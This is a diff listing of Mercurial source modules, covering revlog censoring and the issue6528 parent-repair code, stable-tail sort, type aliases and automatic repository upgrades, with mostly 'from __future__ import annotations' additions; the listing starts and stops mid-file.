339 341 new_sidedata_filepath, 'r+b'
340 342 ) as new_sidedata_file:
341 343 new_index_file.seek(0, os.SEEK_END)
342 344 assert new_index_file.tell() == index_cutoff
343 345 new_data_file.seek(0, os.SEEK_END)
344 346 assert new_data_file.tell() == data_cutoff
345 347 new_sidedata_file.seek(0, os.SEEK_END)
346 348 assert new_sidedata_file.tell() == sidedata_cutoff
347 349 yield (
348 350 old_data_file,
349 351 old_sidedata_file,
350 352 new_index_file,
351 353 new_data_file,
352 354 new_sidedata_file,
353 355 )
354 356
355 357 return all_files_opener
356 358
357 359
358 360 def _rewrite_simple(
359 361 revlog,
360 362 old_index,
361 363 all_files,
362 364 rev,
363 365 rewritten_entries,
364 366 tmp_storage,
365 367 ):
366 368 """append a normal revision to the index after the rewritten one(s)"""
367 369 (
368 370 old_data_file,
369 371 old_sidedata_file,
370 372 new_index_file,
371 373 new_data_file,
372 374 new_sidedata_file,
373 375 ) = all_files
374 376 entry = old_index[rev]
375 377 flags = entry[ENTRY_DATA_OFFSET] & 0xFFFF
376 378 old_data_offset = entry[ENTRY_DATA_OFFSET] >> 16
377 379
378 380 if rev not in rewritten_entries:
379 381 old_data_file.seek(old_data_offset)
380 382 new_data_size = entry[ENTRY_DATA_COMPRESSED_LENGTH]
381 383 new_data = old_data_file.read(new_data_size)
382 384 data_delta_base = entry[ENTRY_DELTA_BASE]
383 385 d_comp_mode = entry[ENTRY_DATA_COMPRESSION_MODE]
384 386 else:
385 387 (
386 388 data_delta_base,
387 389 start,
388 390 end,
389 391 d_comp_mode,
390 392 ) = rewritten_entries[rev]
391 393 new_data_size = end - start
392 394 tmp_storage.seek(start)
393 395 new_data = tmp_storage.read(new_data_size)
394 396
395 397 # It might be faster to group consecutive read/write operations;
396 398 # however, this is the censor operation, which is not focused on
397 399 # stellar performance, so this optimisation has not been written
398 400 # yet.
399 401 new_data_offset = new_data_file.tell()
400 402 new_data_file.write(new_data)
401 403
402 404 sidedata_size = entry[ENTRY_SIDEDATA_COMPRESSED_LENGTH]
403 405 new_sidedata_offset = new_sidedata_file.tell()
404 406 if 0 < sidedata_size:
405 407 old_sidedata_offset = entry[ENTRY_SIDEDATA_OFFSET]
406 408 old_sidedata_file.seek(old_sidedata_offset)
407 409 new_sidedata = old_sidedata_file.read(sidedata_size)
408 410 new_sidedata_file.write(new_sidedata)
409 411
410 412 data_uncompressed_length = entry[ENTRY_DATA_UNCOMPRESSED_LENGTH]
411 413 sd_com_mode = entry[ENTRY_SIDEDATA_COMPRESSION_MODE]
412 414 assert data_delta_base <= rev, (data_delta_base, rev)
413 415
414 416 new_entry = revlogutils.entry(
415 417 flags=flags,
416 418 data_offset=new_data_offset,
417 419 data_compressed_length=new_data_size,
418 420 data_uncompressed_length=data_uncompressed_length,
419 421 data_delta_base=data_delta_base,
420 422 link_rev=entry[ENTRY_LINK_REV],
421 423 parent_rev_1=entry[ENTRY_PARENT_1],
422 424 parent_rev_2=entry[ENTRY_PARENT_2],
423 425 node_id=entry[ENTRY_NODE_ID],
424 426 sidedata_offset=new_sidedata_offset,
425 427 sidedata_compressed_length=sidedata_size,
426 428 data_compression_mode=d_comp_mode,
427 429 sidedata_compression_mode=sd_com_mode,
428 430 )
429 431 revlog.index.append(new_entry)
430 432 entry_bin = revlog.index.entry_binary(rev)
431 433 new_index_file.write(entry_bin)
432 434
433 435 revlog._docket.index_end = new_index_file.tell()
434 436 revlog._docket.data_end = new_data_file.tell()
435 437 revlog._docket.sidedata_end = new_sidedata_file.tell()
436 438
437 439
438 440 def _rewrite_censor(
439 441 revlog,
440 442 old_index,
441 443 all_files,
442 444 rev,
443 445 tombstone,
444 446 ):
445 447 """rewrite and append a censored revision"""
446 448 (
447 449 old_data_file,
448 450 old_sidedata_file,
449 451 new_index_file,
450 452 new_data_file,
451 453 new_sidedata_file,
452 454 ) = all_files
453 455 entry = old_index[rev]
454 456
455 457 # XXX consider trying the default compression too
456 458 new_data_size = len(tombstone)
457 459 new_data_offset = new_data_file.tell()
458 460 new_data_file.write(tombstone)
459 461
460 462 # we are not adding any sidedata as they might leak info about the censored version
461 463
462 464 link_rev = entry[ENTRY_LINK_REV]
463 465
464 466 p1 = entry[ENTRY_PARENT_1]
465 467 p2 = entry[ENTRY_PARENT_2]
466 468
467 469 new_entry = revlogutils.entry(
468 470 flags=constants.REVIDX_ISCENSORED,
469 471 data_offset=new_data_offset,
470 472 data_compressed_length=new_data_size,
471 473 data_uncompressed_length=new_data_size,
472 474 data_delta_base=rev,
473 475 link_rev=link_rev,
474 476 parent_rev_1=p1,
475 477 parent_rev_2=p2,
476 478 node_id=entry[ENTRY_NODE_ID],
477 479 sidedata_offset=0,
478 480 sidedata_compressed_length=0,
479 481 data_compression_mode=COMP_MODE_PLAIN,
480 482 sidedata_compression_mode=COMP_MODE_PLAIN,
481 483 )
482 484 revlog.index.append(new_entry)
483 485 entry_bin = revlog.index.entry_binary(rev)
484 486 new_index_file.write(entry_bin)
485 487 revlog._docket.index_end = new_index_file.tell()
486 488 revlog._docket.data_end = new_data_file.tell()
487 489
488 490
489 491 def _get_filename_from_filelog_index(path):
490 492 # Drop the extension and the `data/` prefix
491 493 path_part = path.rsplit(b'.', 1)[0].split(b'/', 1)
492 494 if len(path_part) < 2:
493 495 msg = _(b"cannot recognize filelog from filename: '%s'")
494 496 msg %= path
495 497 raise error.Abort(msg)
496 498
497 499 return path_part[1]
498 500
499 501
500 502 def _filelog_from_filename(repo, path):
501 503 """Returns the filelog for the given `path`. Stolen from `engine.py`"""
502 504
503 505 from .. import filelog # avoid cycle
504 506
505 507 fl = filelog.filelog(repo.svfs, path)
506 508 return fl
507 509
508 510
509 511 def _write_swapped_parents(repo, rl, rev, offset, fp):
510 512 """Swaps p1 and p2 and overwrites the revlog entry for `rev` in `fp`"""
511 513 from ..pure import parsers # avoid cycle
512 514
513 515 if repo._currentlock(repo._lockref) is None:
514 516 # Let's be paranoid about it
515 517 msg = "repo needs to be locked to rewrite parents"
516 518 raise error.ProgrammingError(msg)
517 519
518 520 index_format = parsers.IndexObject.index_format
519 521 entry = rl.index[rev]
520 522 new_entry = list(entry)
521 523 new_entry[5], new_entry[6] = entry[6], entry[5]
522 524 packed = index_format.pack(*new_entry[:8])
523 525 fp.seek(offset)
524 526 fp.write(packed)
525 527
526 528
527 529 def _reorder_filelog_parents(repo, fl, to_fix):
528 530 """
529 531 Swaps p1 and p2 for all `to_fix` revisions of filelog `fl` and writes the
530 532 new version to disk, overwriting the old one with a rename.
531 533 """
532 534 from ..pure import parsers # avoid cycle
533 535
534 536 ui = repo.ui
535 537 assert len(to_fix) > 0
536 538 rl = fl._revlog
537 539 if rl._format_version != constants.REVLOGV1:
538 540 msg = "expected version 1 revlog, got version '%d'" % rl._format_version
539 541 raise error.ProgrammingError(msg)
540 542
541 543 index_file = rl._indexfile
542 544 new_file_path = index_file + b'.tmp-parents-fix'
543 545 repaired_msg = _(b"repaired revision %d of 'filelog %s'\n")
544 546
545 547 with ui.uninterruptible():
546 548 try:
547 549 util.copyfile(
548 550 rl.opener.join(index_file),
549 551 rl.opener.join(new_file_path),
550 552 checkambig=rl.data_config.check_ambig,
551 553 )
552 554
553 555 with rl.opener(new_file_path, mode=b"r+") as fp:
554 556 if rl._inline:
555 557 index = parsers.InlinedIndexObject(fp.read())
556 558 for rev in fl.revs():
557 559 if rev in to_fix:
558 560 offset = index._calculate_index(rev)
559 561 _write_swapped_parents(repo, rl, rev, offset, fp)
560 562 ui.write(repaired_msg % (rev, index_file))
561 563 else:
562 564 index_format = parsers.IndexObject.index_format
563 565 for rev in to_fix:
564 566 offset = rev * index_format.size
565 567 _write_swapped_parents(repo, rl, rev, offset, fp)
566 568 ui.write(repaired_msg % (rev, index_file))
567 569
568 570 rl.opener.rename(new_file_path, index_file)
569 571 rl.clearcaches()
570 572 rl._loadindex()
571 573 finally:
572 574 util.tryunlink(new_file_path)
573 575
574 576
575 577 def _is_revision_affected(fl, filerev, metadata_cache=None):
576 578 full_text = lambda: fl._revlog.rawdata(filerev)
577 579 parent_revs = lambda: fl._revlog.parentrevs(filerev)
578 580 return _is_revision_affected_inner(
579 581 full_text, parent_revs, filerev, metadata_cache
580 582 )
581 583
582 584
583 585 def _is_revision_affected_inner(
584 586 full_text,
585 587 parents_revs,
586 588 filerev,
587 589 metadata_cache=None,
588 590 ):
589 591 """Mercurial currently (5.9rc0) uses `p1 == nullrev and p2 != nullrev` as a
590 592 special meaning compared to the reverse in the context of filelog-based
591 593 copytracing. issue6528 exists because new code assumed that parent ordering
592 594 didn't matter, so this detects if the revision contains metadata (since
593 595 it's only used for filelog-based copytracing) and its parents are in the
594 596 "wrong" order."""
595 597 try:
596 598 raw_text = full_text()
597 599 except error.CensoredNodeError:
598 600 # We don't care about censored nodes as they never carry metadata
599 601 return False
600 602
601 603 # raw text can be a `memoryview`, which doesn't implement `startswith`
602 604 has_meta = bytes(raw_text[:2]) == b'\x01\n'
603 605 if metadata_cache is not None:
604 606 metadata_cache[filerev] = has_meta
605 607 if has_meta:
606 608 (p1, p2) = parents_revs()
607 609 if p1 != nullrev and p2 == nullrev:
608 610 return True
609 611 return False
610 612
611 613
612 614 def _is_revision_affected_fast(repo, fl, filerev, metadata_cache):
613 615 rl = fl._revlog
614 616 is_censored = lambda: rl.iscensored(filerev)
615 617 delta_base = lambda: rl.deltaparent(filerev)
616 618 delta = lambda: rl._chunk(filerev)
617 619 full_text = lambda: rl.rawdata(filerev)
618 620 parent_revs = lambda: rl.parentrevs(filerev)
619 621 return _is_revision_affected_fast_inner(
620 622 is_censored,
621 623 delta_base,
622 624 delta,
623 625 full_text,
624 626 parent_revs,
625 627 filerev,
626 628 metadata_cache,
627 629 )
628 630
629 631
630 632 def _is_revision_affected_fast_inner(
631 633 is_censored,
632 634 delta_base,
633 635 delta,
634 636 full_text,
635 637 parent_revs,
636 638 filerev,
637 639 metadata_cache,
638 640 ):
639 641 """Optimization fast-path for `_is_revision_affected`.
640 642
641 643 `metadata_cache` is a dict of `{rev: has_metadata}` which allows any
642 644 revision to check if its base has metadata, saving computation of the full
643 645 text by looking at the current delta instead.
644 646
645 647 This optimization only works if the revisions are looked at in order."""
646 648
647 649 if is_censored():
648 650 # Censored revisions don't contain metadata, so they cannot be affected
649 651 metadata_cache[filerev] = False
650 652 return False
651 653
652 654 p1, p2 = parent_revs()
653 655 if p1 == nullrev or p2 != nullrev:
654 656 return False
655 657
656 658 delta_parent = delta_base()
657 659 parent_has_metadata = metadata_cache.get(delta_parent)
658 660 if parent_has_metadata is None:
659 661 return _is_revision_affected_inner(
660 662 full_text,
661 663 parent_revs,
662 664 filerev,
663 665 metadata_cache,
664 666 )
665 667
666 668 chunk = delta()
667 669 if not len(chunk):
668 670 # No diff for this revision
669 671 return parent_has_metadata
670 672
671 673 header_length = 12
672 674 if len(chunk) < header_length:
673 675 raise error.Abort(_(b"patch cannot be decoded"))
674 676
675 677 start, _end, _length = struct.unpack(b">lll", chunk[:header_length])
676 678
677 679 if start < 2: # len(b'\x01\n') == 2
678 680 # This delta does *something* to the metadata marker (if any).
679 681 # Check it the slow way
680 682 is_affected = _is_revision_affected_inner(
681 683 full_text,
682 684 parent_revs,
683 685 filerev,
684 686 metadata_cache,
685 687 )
686 688 return is_affected
687 689
688 690 # The diff did not remove or add the metadata header, so this revision is
689 691 # in the same situation as its parent
690 692 metadata_cache[filerev] = parent_has_metadata
691 693 return parent_has_metadata
692 694
693 695
694 696 def _from_report(ui, repo, context, from_report, dry_run):
695 697 """
696 698 Fix the revisions given in the `from_report` file, but still check if the
697 699 revisions are indeed affected to prevent an unfortunate cyclic situation
698 700 where we'd swap well-ordered parents again.
699 701
700 702 See the doc for `debug_fix_issue6528` for the format documentation.
701 703 """
702 704 ui.write(_(b"loading report file '%s'\n") % from_report)
703 705
704 706 with context(), open(from_report, mode='rb') as f:
705 707 for line in f.read().split(b'\n'):
706 708 if not line:
707 709 continue
708 710 filenodes, filename = line.split(b' ', 1)
709 711 fl = _filelog_from_filename(repo, filename)
710 712 to_fix = set(
711 713 fl.rev(binascii.unhexlify(n)) for n in filenodes.split(b',')
712 714 )
713 715 excluded = set()
714 716
715 717 for filerev in to_fix:
716 718 if _is_revision_affected(fl, filerev):
717 719 msg = b"found affected revision %d for filelog '%s'\n"
718 720 ui.warn(msg % (filerev, filename))
719 721 else:
720 722 msg = _(b"revision %s of file '%s' is not affected\n")
721 723 msg %= (binascii.hexlify(fl.node(filerev)), filename)
722 724 ui.warn(msg)
723 725 excluded.add(filerev)
724 726
725 727 to_fix = to_fix - excluded
726 728 if not to_fix:
727 729 msg = _(b"no affected revisions were found for '%s'\n")
728 730 ui.write(msg % filename)
729 731 continue
730 732 if not dry_run:
731 733 _reorder_filelog_parents(repo, fl, sorted(to_fix))
732 734
733 735
734 736 def filter_delta_issue6528(revlog, deltas_iter):
735 737 """filter incomind deltas to repaire issue 6528 on the fly"""
736 738 metadata_cache = {}
737 739
738 740 deltacomputer = deltas.deltacomputer(revlog)
739 741
740 742 for rev, d in enumerate(deltas_iter, len(revlog)):
741 743 (
742 744 node,
743 745 p1_node,
744 746 p2_node,
745 747 linknode,
746 748 deltabase,
747 749 delta,
748 750 flags,
749 751 sidedata,
750 752 ) = d
751 753
752 754 if not revlog.index.has_node(deltabase):
753 755 raise error.LookupError(
754 756 deltabase, revlog.radix, _(b'unknown parent')
755 757 )
756 758 base_rev = revlog.rev(deltabase)
757 759 if not revlog.index.has_node(p1_node):
758 760 raise error.LookupError(p1_node, revlog.radix, _(b'unknown parent'))
759 761 p1_rev = revlog.rev(p1_node)
760 762 if not revlog.index.has_node(p2_node):
761 763 raise error.LookupError(p2_node, revlog.radix, _(b'unknown parent'))
762 764 p2_rev = revlog.rev(p2_node)
763 765
764 766 is_censored = lambda: bool(flags & REVIDX_ISCENSORED)
766 768 delta_base = lambda: base_rev
767 769 parent_revs = lambda: (p1_rev, p2_rev)
768 770
769 771 def full_text():
770 772 # note: being able to reuse the full text computation in the
771 773 # underlying addrevision would be useful; however, this is a bit too
772 774 # intrusive for the "quick" issue6528 fix we are writing before the
773 775 # 5.8 release
774 776 textlen = mdiff.patchedsize(revlog.size(base_rev), delta)
775 777
776 778 revinfo = revlogutils.revisioninfo(
777 779 node,
778 780 p1_node,
779 781 p2_node,
780 782 [None],
781 783 textlen,
782 784 (base_rev, delta),
783 785 flags,
784 786 )
785 787 return deltacomputer.buildtext(revinfo)
786 788
787 789 is_affected = _is_revision_affected_fast_inner(
788 790 is_censored,
789 791 delta_base,
790 792 lambda: delta,
791 793 full_text,
792 794 parent_revs,
793 795 rev,
794 796 metadata_cache,
795 797 )
796 798 if is_affected:
797 799 d = (
798 800 node,
799 801 p2_node,
800 802 p1_node,
801 803 linknode,
802 804 deltabase,
803 805 delta,
804 806 flags,
805 807 sidedata,
806 808 )
807 809 yield d
808 810
809 811
810 812 def repair_issue6528(
811 813 ui, repo, dry_run=False, to_report=None, from_report=None, paranoid=False
812 814 ):
813 815 @contextlib.contextmanager
814 816 def context():
815 817 if dry_run or to_report: # No need for locking
816 818 yield
817 819 else:
818 820 with repo.wlock(), repo.lock():
819 821 yield
820 822
821 823 if from_report:
822 824 return _from_report(ui, repo, context, from_report, dry_run)
823 825
824 826 report_entries = []
825 827
826 828 with context():
827 829 files = list(
828 830 entry
829 831 for entry in repo.store.data_entries()
830 832 if entry.is_revlog and entry.is_filelog
831 833 )
832 834
833 835 progress = ui.makeprogress(
834 836 _(b"looking for affected revisions"),
835 837 unit=_(b"filelogs"),
836 838 total=len(files),
837 839 )
838 840 found_nothing = True
839 841
840 842 for entry in files:
841 843 progress.increment()
842 844 filename = entry.target_id
843 845 fl = _filelog_from_filename(repo, entry.target_id)
844 846
845 847 # Set of filerevs (or hex filenodes if `to_report`) that need fixing
846 848 to_fix = set()
847 849 metadata_cache = {}
848 850 for filerev in fl.revs():
849 851 affected = _is_revision_affected_fast(
850 852 repo, fl, filerev, metadata_cache
851 853 )
852 854 if paranoid:
853 855 slow = _is_revision_affected(fl, filerev)
854 856 if slow != affected:
855 857 msg = _(b"paranoid check failed for '%s' at node %s")
856 858 node = binascii.hexlify(fl.node(filerev))
857 859 raise error.Abort(msg % (filename, node))
858 860 if affected:
859 861 msg = b"found affected revision %d for file '%s'\n"
860 862 ui.warn(msg % (filerev, filename))
861 863 found_nothing = False
862 864 if not dry_run:
863 865 if to_report:
864 866 to_fix.add(binascii.hexlify(fl.node(filerev)))
865 867 else:
866 868 to_fix.add(filerev)
867 869
868 870 if to_fix:
869 871 to_fix = sorted(to_fix)
870 872 if to_report:
871 873 report_entries.append((filename, to_fix))
872 874 else:
873 875 _reorder_filelog_parents(repo, fl, to_fix)
874 876
875 877 if found_nothing:
876 878 ui.write(_(b"no affected revisions were found\n"))
877 879
878 880 if to_report and report_entries:
879 881 with open(to_report, mode="wb") as f:
880 882 for path, to_fix in report_entries:
881 883 f.write(b"%s %s\n" % (b",".join(to_fix), path))
882 884
883 885 progress.complete()
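To restate the issue6528 detection used throughout this file: a filelog revision is considered affected when its raw text starts with the copy-metadata marker `\x01\n` and its parents are stored in the "wrong" order (p1 set, p2 null). A toy restatement over plain values, for illustration only — the real checks go through revlog accessors and the metadata cache:

    NULLREV = -1

    def looks_affected(raw_text, p1, p2):
        """Core of _is_revision_affected_inner, over plain values."""
        has_meta = bytes(raw_text[:2]) == b'\x01\n'   # copy-metadata marker
        return has_meta and p1 != NULLREV and p2 == NULLREV

    assert looks_affected(b'\x01\ncopy: a\n\x01\nbody', 3, -1)
    assert not looks_affected(b'plain body', 3, -1)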
@@ -1,172 +1,174
1 1 # stabletailsort.py - stable ordering of revisions
2 2 #
3 3 # Copyright 2021-2023 Pacien TRAN-GIRARD <pacien.trangirard@pacien.net>
4 4 #
5 5 # This software may be used and distributed according to the terms of the
6 6 # GNU General Public License version 2 or any later version.
7 7
8 8 """
9 9 Stable-tail sort computation.
10 10
11 11 The "stable-tail sort", or STS, is a reverse topological ordering of the
12 12 ancestors of a node, which tends to share large suffixes with the stable-tail
13 13 sort of ancestors and other nodes, giving it its name.
14 14
15 15 Its properties should make it suitable for making chunks of ancestors with high
16 16 reuse and incrementality for example.
17 17
18 18 This module and implementation are experimental. Most functions are not yet
19 19 optimised to operate on large production graphs.
20 20 """
21 21
22 from __future__ import annotations
23
22 24 import itertools
23 25 from ..node import nullrev
24 26 from .. import ancestor
25 27
26 28
27 29 def _sorted_parents(cl, p1, p2):
28 30 """
29 31 Chooses and returns the pair (px, pt) from (p1, p2).
30 32
31 33 Where
32 34 "px" denotes the parent starting the "exclusive" part, and
33 35 "pt" denotes the parent starting the "Tail" part.
34 36
35 37 "px" is chosen as the parent with the lowest rank with the goal of
36 38 minimising the size of the exclusive part and maximising the size of the
37 39 tail part, hopefully reducing the overall complexity of the stable-tail
38 40 sort.
39 41
40 42 In case of equal ranks, the stable node ID is used as a tie-breaker.
41 43 """
42 44 r1, r2 = cl.fast_rank(p1), cl.fast_rank(p2)
43 45 if r1 < r2:
44 46 return (p1, p2)
45 47 elif r1 > r2:
46 48 return (p2, p1)
47 49 elif cl.node(p1) < cl.node(p2):
48 50 return (p1, p2)
49 51 else:
50 52 return (p2, p1)
51 53
52 54
53 55 def _nonoedipal_parent_revs(cl, rev):
54 56 """
55 57 Returns the non-œdipal parent pair of the given revision.
56 58
57 59 An œdipal merge is a merge with parents p1, p2 with either
58 60 p1 in ancestors(p2) or p2 in ancestors(p1).
59 61 In the first case, p1 is the œdipal parent.
60 62 In the second case, p2 is the œdipal parent.
61 63
62 64 Œdipal edges start empty exclusive parts. They do not bring new ancestors.
63 65 As such, they can be skipped when computing any topological sort or any
64 66 iteration over the ancestors of a node.
65 67
66 68 The œdipal edges are eliminated here using the rank information.
67 69 """
68 70 p1, p2 = cl.parentrevs(rev)
69 71 if p1 == nullrev or cl.fast_rank(p2) == cl.fast_rank(rev) - 1:
70 72 return p2, nullrev
71 73 elif p2 == nullrev or cl.fast_rank(p1) == cl.fast_rank(rev) - 1:
72 74 return p1, nullrev
73 75 else:
74 76 return p1, p2
75 77
76 78
77 79 def _parents(cl, rev):
78 80 p1, p2 = _nonoedipal_parent_revs(cl, rev)
79 81 if p2 == nullrev:
80 82 return p1, p2
81 83
82 84 return _sorted_parents(cl, p1, p2)
83 85
84 86
85 87 def _stable_tail_sort_naive(cl, head_rev):
86 88 """
87 89 Naive topological iterator of the ancestors given by the stable-tail sort.
88 90
89 91 The stable-tail sort of a node "h" is defined as the sequence:
90 92 sts(h) := [h] + excl(h) + sts(pt(h))
91 93 where excl(h) := u for u in sts(px(h)) if u not in ancestors(pt(h))
92 94
93 95 This implementation uses a call-stack whose size is
94 96 O(number of open merges).
95 97
96 98 As such, this implementation exists mainly as a defining reference.
97 99 """
98 100 cursor_rev = head_rev
99 101 while cursor_rev != nullrev:
100 102 yield cursor_rev
101 103
102 104 px, pt = _parents(cl, cursor_rev)
103 105 if pt == nullrev:
104 106 cursor_rev = px
105 107 else:
106 108 tail_ancestors = ancestor.lazyancestors(
107 109 cl.parentrevs, (pt,), inclusive=True
108 110 )
109 111 exclusive_ancestors = (
110 112 a
111 113 for a in _stable_tail_sort_naive(cl, px)
112 114 if a not in tail_ancestors
113 115 )
114 116
115 117 # Notice that excl(cur) is disjoint from ancestors(pt),
116 118 # so there is no double-counting:
117 119 # rank(cur) = len([cur]) + len(excl(cur)) + rank(pt)
118 120 excl_part_size = cl.fast_rank(cursor_rev) - cl.fast_rank(pt) - 1
119 121 yield from itertools.islice(exclusive_ancestors, excl_part_size)
120 122 cursor_rev = pt
121 123
122 124
123 125 def _find_all_leaps_naive(cl, head_rev):
124 126 """
125 127 Yields the leaps in the stable-tail sort of the given revision.
126 128
127 129 A leap is a pair of revisions (source, target) consecutive in the
128 130 stable-tail sort of a head, for which target != px(source).
129 131
130 132 Leaps are yielded in the same order as encountered in the stable-tail sort,
131 133 from head to root.
132 134 """
133 135 sts = _stable_tail_sort_naive(cl, head_rev)
134 136 prev = next(sts)
135 137 for current in sts:
136 138 if current != _parents(cl, prev)[0]:
137 139 yield (prev, current)
138 140
139 141 prev = current
140 142
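# Continuing the hypothetical r0..r3 example above, sts(r3) = [r3, r1, r2, r0]
# and the only consecutive pair whose target is not the px of its source is
# (r1, r2), because px(r1) = r0. For head r3 this generator would therefore
# yield the single leap (r1, r2).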
141 143
142 144 def _find_specific_leaps_naive(cl, head_rev):
143 145 """
144 146 Returns the specific leaps in the stable-tail sort of the given revision.
145 147
146 148 Specific leaps are leaps that appear in the stable-tail sort of a given
147 149 revision, but not in the stable-tail sort of any of its ancestors.
148 150
149 151 The final leaps (leading to the pt of the considered merge) are omitted.
150 152
151 153 Only merge nodes can have associated specific leaps.
152 154
153 155 This implementation uses the whole leap sets of the given revision and
154 156 of its parents.
155 157 """
156 158 px, pt = _parents(cl, head_rev)
157 159 if px == nullrev or pt == nullrev:
158 160 return # linear nodes cannot have specific leaps
159 161
160 162 parents_leaps = set(_find_all_leaps_naive(cl, px))
161 163
162 164 sts = _stable_tail_sort_naive(cl, head_rev)
163 165 prev = next(sts)
164 166 for current in sts:
165 167 if current == pt:
166 168 break
167 169 if current != _parents(cl, prev)[0]:
168 170 leap = (prev, current)
169 171 if leap not in parents_leaps:
170 172 yield leap
171 173
172 174 prev = current
@@ -1,48 +1,50
1 1 # typelib.py - type hint aliases and support
2 2 #
3 3 # Copyright 2022 Matt Harbison <matt_harbison@yahoo.com>
4 4 #
5 5 # This software may be used and distributed according to the terms of the
6 6 # GNU General Public License version 2 or any later version.
7 7
8 from __future__ import annotations
9
8 10 import typing
9 11
10 12 from typing import (
11 13 Callable,
12 14 )
13 15
14 16 # Note: this is slightly different from pycompat.TYPE_CHECKING, as using
15 17 # pycompat causes the BinaryIO_Proxy type to be resolved to ``object`` when
16 18 # used as the base class during a pytype run.
17 19 TYPE_CHECKING = typing.TYPE_CHECKING
18 20
19 21
20 22 # The BinaryIO class provides empty methods, which at runtime means that
21 23 # ``__getattr__`` on the proxy classes won't get called for the methods that
22 24 # should delegate to the internal object. So to avoid runtime changes because
23 25 # of the required typing inheritance, just use BinaryIO when typechecking, and
24 26 # ``object`` otherwise.
25 27 if TYPE_CHECKING:
26 28 from typing import (
27 29 BinaryIO,
28 30 Union,
29 31 )
30 32
31 33 from . import (
32 34 node,
33 35 posix,
34 36 windows,
35 37 )
36 38
37 39 BinaryIO_Proxy = BinaryIO
38 40 CacheStat = Union[posix.cachestat, windows.cachestat]
39 41 NodeConstants = node.sha1nodeconstants
40 42 else:
41 43 from typing import Any
42 44
43 45 BinaryIO_Proxy = object
44 46 CacheStat = Any
45 47 NodeConstants = Any
46 48
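# Minimal sketch of the intended usage (the ``fileproxy`` class below is
# hypothetical and only illustrates the pattern): a runtime proxy can inherit
# from BinaryIO_Proxy so type checkers see the full BinaryIO interface, while
# at runtime the base class is a plain ``object`` and attribute lookups still
# fall through to ``__getattr__``.
#
#     class fileproxy(BinaryIO_Proxy):
#         def __init__(self, fp):
#             self._fp = fp
#
#         def __getattr__(self, name):
#             return getattr(self._fp, name)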
47 49 # scmutil.getuipathfn() related callback.
48 50 UiPathFn = Callable[[bytes], bytes]
@@ -1,254 +1,257
1 1 # upgrade.py - functions for automatic upgrade of Mercurial repository
2 2 #
3 3 # Copyright (c) 2022-present, Pierre-Yves David
4 4 #
5 5 # This software may be used and distributed according to the terms of the
6 6 # GNU General Public License version 2 or any later version.
7
8 from __future__ import annotations
9
7 10 from ..i18n import _
8 11
9 12 from .. import (
10 13 error,
11 14 requirements as requirementsmod,
12 15 scmutil,
13 16 )
14 17
15 18 from . import (
16 19 actions,
17 20 engine,
18 21 )
19 22
20 23
21 24 class AutoUpgradeOperation(actions.BaseOperation):
22 25 """A limited Upgrade Operation used to run simple auto-upgrade tasks
23 26
24 27 (Expand it as needed in the future)
25 28 """
26 29
27 30 def __init__(self, req):
28 31 super().__init__(
29 32 new_requirements=req,
30 33 backup_store=False,
31 34 )
32 35
33 36
34 37 def get_share_safe_action(repo):
35 38 """return an automatic-upgrade action for `share-safe` if applicable
36 39
37 40 If no action is needed, return None, otherwise return a callback to upgrade
38 41 or downgrade the repository according to the configuration and repository
39 42 format.
40 43 """
41 44 ui = repo.ui
42 45 requirements = repo.requirements
43 46 auto_upgrade_share_source = ui.configbool(
44 47 b'format',
45 48 b'use-share-safe.automatic-upgrade-of-mismatching-repositories',
46 49 )
47 50 auto_upgrade_quiet = ui.configbool(
48 51 b'format',
49 52 b'use-share-safe.automatic-upgrade-of-mismatching-repositories:quiet',
50 53 )
51 54
52 55 action = None
53 56
54 57 if (
55 58 auto_upgrade_share_source
56 59 and requirementsmod.SHARED_REQUIREMENT not in requirements
57 60 ):
58 61 sf_config = ui.configbool(b'format', b'use-share-safe')
59 62 sf_local = requirementsmod.SHARESAFE_REQUIREMENT in requirements
60 63 if sf_config and not sf_local:
61 64 msg = _(
62 65 b"automatically upgrading repository to the `share-safe`"
63 66 b" feature\n"
64 67 )
65 68 hint = b"(see `hg help config.format.use-share-safe` for details)\n"
66 69
67 70 def action():
68 71 if not (ui.quiet or auto_upgrade_quiet):
69 72 ui.write_err(msg)
70 73 ui.write_err(hint)
71 74 requirements.add(requirementsmod.SHARESAFE_REQUIREMENT)
72 75 scmutil.writereporequirements(repo, requirements)
73 76
74 77 elif sf_local and not sf_config:
75 78 msg = _(
76 79 b"automatically downgrading repository from the `share-safe`"
77 80 b" feature\n"
78 81 )
79 82 hint = b"(see `hg help config.format.use-share-safe` for details)\n"
80 83
81 84 def action():
82 85 if not (ui.quiet or auto_upgrade_quiet):
83 86 ui.write_err(msg)
84 87 ui.write_err(hint)
85 88 requirements.discard(requirementsmod.SHARESAFE_REQUIREMENT)
86 89 scmutil.writereporequirements(repo, requirements)
87 90
88 91 return action
89 92
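# Illustrative configuration (see `hg help config.format` for the reference
# documentation) that makes mismatching repositories silently follow the
# configured `share-safe` setting when they are accessed:
#
#   [format]
#   use-share-safe = yes
#   use-share-safe.automatic-upgrade-of-mismatching-repositories = yes
#   use-share-safe.automatic-upgrade-of-mismatching-repositories:quiet = yes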
90 93
91 94 def get_tracked_hint_action(repo):
92 95 """return an automatic-upgrade action for `tracked-hint` if applicable
93 96
94 97 If no action is needed, return None, otherwise return a callback to upgrade
95 98 or downgrade the repository according to the configuration and repository
96 99 format.
97 100 """
98 101 ui = repo.ui
99 102 requirements = set(repo.requirements)
100 103 auto_upgrade_tracked_hint = ui.configbool(
101 104 b'format',
102 105 b'use-dirstate-tracked-hint.automatic-upgrade-of-mismatching-repositories',
103 106 )
104 107 auto_upgrade_quiet = ui.configbool(
105 108 b'format',
106 109 b'use-dirstate-tracked-hint.automatic-upgrade-of-mismatching-repositories:quiet',
107 110 )
108 111
109 112 action = None
110 113
111 114 if auto_upgrade_tracked_hint:
112 115 th_config = ui.configbool(b'format', b'use-dirstate-tracked-hint')
113 116 th_local = requirementsmod.DIRSTATE_TRACKED_HINT_V1 in requirements
114 117 if th_config and not th_local:
115 118 msg = _(
116 119 b"automatically upgrading repository to the `tracked-hint`"
117 120 b" feature\n"
118 121 )
119 122 hint = b"(see `hg help config.format.use-dirstate-tracked-hint` for details)\n"
120 123
121 124 def action():
122 125 if not (ui.quiet or auto_upgrade_quiet):
123 126 ui.write_err(msg)
124 127 ui.write_err(hint)
125 128 requirements.add(requirementsmod.DIRSTATE_TRACKED_HINT_V1)
126 129 op = AutoUpgradeOperation(requirements)
127 130 engine.upgrade_tracked_hint(ui, repo, op, add=True)
128 131
129 132 elif th_local and not th_config:
130 133 msg = _(
131 134 b"automatically downgrading repository from the `tracked-hint`"
132 135 b" feature\n"
133 136 )
